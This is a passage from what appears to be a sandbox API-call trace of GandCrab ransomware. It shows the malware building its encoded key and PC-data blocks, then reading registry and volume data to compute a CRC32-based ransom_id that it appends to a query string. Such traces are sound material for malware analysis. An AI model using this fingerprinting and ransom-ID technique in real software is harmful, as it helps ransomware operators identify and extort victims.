doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n" [0040.775] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n", lpString2="---END PC DATA---" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---" [0040.775] VirtualFree (lpAddress=0x2ed0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.776] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.776] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0040.787] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf5a8 | out: phkResult=0xdcf5a8*=0x260) returned 0x0 [0040.787] RegQueryValueExW (in: hKey=0x260, lpValueName="Domain", lpReserved=0x0, lpType=0x0, lpData=0x2ea0000, lpcbData=0xdcf5b8*=0x80 | out: lpType=0x0, lpData=0x2ea0000*=0x0, lpcbData=0xdcf5b8*=0x2) returned 0x0 [0040.787] RegCloseKey (hKey=0x260) returned 0x0 [0040.787] wsprintfW (in: param_1=0x2ea0000, param_2="WORKGROUP" | out: param_1="WORKGROUP") returned 9 [0040.787] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ed0000 [0040.788] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2ef0000 [0040.788] GetWindowsDirectoryW (in: lpBuffer=0x2ef0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0040.788] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2ef0600, lpMaximumComponentLength=0x2ef0608, lpFileSystemFlags=0x2ef0604, lpFileSystemNameBuffer=0x2ef0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef0600*=0xd2ca4def, lpMaximumComponentLength=0x2ef0608*=0xff, lpFileSystemFlags=0x2ef0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0040.788] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf5a8 | out: phkResult=0xdcf5a8*=0x260) returned 0x0 [0040.788] RegQueryValueExW (in: hKey=0x260, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x2ef060c, lpcbData=0xdcf5b8*=0x80 | out: lpType=0x0, lpData=0x2ef060c*=0x49, lpcbData=0xdcf5b8*=0x54) returned 0x0 [0040.788] RegCloseKey (hKey=0x260) returned 0x0 [0040.789] lstrlenW (lpString="Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHz") returned 41 [0040.789] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf5a8 | out: phkResult=0xdcf5a8*=0x260) returned 0x0 [0040.789] RegQueryValueExW (in: hKey=0x260, lpValueName="Identifier", lpReserved=0x0, lpType=0x0, lpData=0x2ef065e, lpcbData=0xdcf5b8*=0x80 | out: lpType=0x0, lpData=0x2ef065e*=0x49, lpcbData=0xdcf5b8*=0x4a) returned 0x0 [0040.789] RegCloseKey (hKey=0x260) returned 0x0 [0040.789] wsprintfW (in: param_1=0x2ed0000, param_2="%d" | out: param_1="-758493713") returned 10 [0040.789] lstrcatW (in: lpString1="-758493713", lpString2="Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHzIntel64 Family 6 Model 94 Stepping 3" | out: lpString1="-758493713Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHzIntel64 Family 6 Model 94 Stepping 3") returned="-758493713Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHzIntel64 Family 6 Model 94 Stepping 3" [0040.789] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0040.789] GetProcAddress (hModule=0x77c40000, lpProcName="RtlComputeCrc32") returned 0x77c66b10 [0040.789] lstrlenW (lpString="-758493713Intel(R) Xeon(R) CPU E3-1270 v5 @ 3.60GHzIntel64 Family 6 Model 94 Stepping 3") returned 87 [0040.796] RtlComputeCrc32 (PartialCrc=0x29a, Buffer=0x2ed0000, Length=0xae) returned 0xdce1bb8b [0040.796] VirtualFree (lpAddress=0x2ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.052] lstrlenW (lpString="WORKGROUP") returned 9 [0041.052] lstrlenW (lpString="pc_group") returned 8 [0041.052] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x40) returned 0x2ef0000 [0041.052] lstrcatW (in: lpString1="", lpString2="pc_group" | out: lpString1="pc_group") returned="pc_group" [0041.052] lstrcatW (in: lpString1="pc_group", lpString2="=" | out: lpString1="pc_group=") returned="pc_group=" [0041.052] lstrcatW (in: lpString1="pc_group=", lpString2="WORKGROUP" | out: lpString1="pc_group=WORKGROUP") returned="pc_group=WORKGROUP" [0041.052] lstrcatW (in: lpString1="pc_group=WORKGROUP", lpString2="&" | out: lpString1="pc_group=WORKGROUP&") returned="pc_group=WORKGROUP&" [0041.052] VirtualAlloc (lpAddress=0x0, dwSize=0x42, flAllocationType=0x3000, flProtect=0x40) returned 0x2f20000 [0041.053] wsprintfW (in: param_1=0x2f20000, param_2="%x%x" | out: param_1="dce1bb8bd2ca4def") returned 16 [0041.053] lstrcatW (in: lpString1="pc_group=WORKGROUP&", lpString2="ransom_id" | out: lpString1="pc_group=WORKGROUP&ransom_id") returned="pc_group=WORKGROUP&ransom_id" [0041.053] lstrcatW (in: lpString1="pc_group=WORKGROUP&ransom_id", lpString2="=" | out: lpString1="pc_group=WORKGROUP&ransom_id=") returned="pc_group=WORKGROUP&ransom_id=" [0041.053] lstrcatW (in: lpString1="pc_group=WORKGROUP&ransom_id=", lpString2="dce1bb8bd2ca4def" | out: 